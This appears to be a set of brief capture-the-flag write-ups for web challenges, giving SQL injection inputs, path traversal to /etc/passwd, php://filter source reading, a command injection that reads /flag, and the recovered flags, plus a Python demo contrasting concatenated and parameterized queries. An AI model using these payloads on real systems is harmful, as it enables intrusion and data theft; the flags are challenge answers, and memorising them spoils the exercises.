[极客大挑战 2019]EasySQL
ADMIN'
123456
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '123456'' at line 1
'
ADMIN
123456'
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456''' at line 1
ADMIN' OR 1#
123456
select * from users where username='ADMIN' OR 1#' and password='123456'
ADMIN
123456' OR 1#
select * from users where username='ADMIN' and password='123456' OR 1#'
ADMIN
123456' || 1#
Swapping OR for || has the same effect.
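An added example (not part of the writeup) showing why the `ADMIN' OR 1#` input lands in the concatenated MariaDB query above, and how a parameterized query keeps the same input inert. The `users` table, its single account and the use of SQLite for the parameterized half are constructed for the demo; `#` is a MariaDB comment, so the unsafe query is only built as a string rather than run.

```python
import sqlite3

# Constructed sample inputs: the two fields from the ADMIN' OR 1# walkthrough.
USERNAME = "ADMIN' OR 1#"
PASSWORD = "123456"


def build_query_unsafe(username: str, password: str) -> str:
    """Reproduce the vulnerable pattern: user input spliced straight into SQL.

    Only builds the string so the effect of the payload is visible; on MariaDB
    '#' starts a comment, so the password check after it is never evaluated.
    """
    return (
        "select * from users where username='" + username
        + "' and password='" + password + "'"
    )


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: placeholders keep the quote and '#' inside the bound value,
    so the username is compared literally and no comment is opened."""
    return conn.execute(
        "select username from users where username=? and password=?",
        (username, password),
    ).fetchone()


def make_demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed account (not the challenge's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.execute("insert into users values ('ADMIN', 'not-123456')")
    conn.commit()
    return conn


if __name__ == "__main__":
    print(build_query_unsafe(USERNAME, PASSWORD))          # the injected query
    print(login_parameterized(make_demo_db(), USERNAME, PASSWORD))  # None
```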
FLAG
flag{be372315-05de-40e4-b24b-61dafe434364}
Copy and paste the whole thing, not just the part inside the braces!!
[极客大挑战 2019]Havefun
FLAG
flag{4edf0e3c-ff14-4e3b-842f-3db91fa54f34}
[HCTF 2018]WarmUp
Open F12 (developer tools).
Append source.php.
Append hint.php instead: the flag is not here; the hint says it is in ffffllllaaaagggg.
Replace with ffffllllaaaagggg: error.
Add ?: back to the original page, nothing there.
Prefix with /?file=, i.e. /?file=hint.php, which is equivalent to /hint.php.
/?file=ffffllllaaaagggg shows nothing.
FLAG
Go up one directory level at a time: /?file=hint.php?../../../../../ffffllllaaaagggg
flag{d244c7c5-d90d-4e99-b45f-3c0ea3877dc0}
[ACTF2020 新生赛]Include1
?file=../../../../../../../../../../../../../../../../etc/passwd
File inclusion vulnerability
- php://filter is used to read source code
- php://input is used to execute PHP code
php://filter/read=convert.base64-encode/resource=xxx # read the file flag.php as base64
FLAG
/?file=php://filter/read=convert.base64-encode/resource=flag.php
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7OTZhYmE3YTgtOGY1NC00MDQxLWFjNTEtODA3ZmU1NjY2NzNmfQo=
Base64 decode: https://www.toolhelper.cn/EncodeDecode/Base64
flag{96aba7a8-8f54-4041-ac51-807fe566673f}
[ACTF2020 新生赛]Exec1
ip=127.0.0||ls
FLAG
ip=127.0.0||cat /flag
flag{81cfb443-3b4c-44ef-88e4-59c973e2755d}
[SUCTF 2019]EasySQL1
1,2
order
1;show databases;
1; show tables;
FLAG
*,1
flag{48283e65-0311-4248-8cf8-7d547adc6b9a}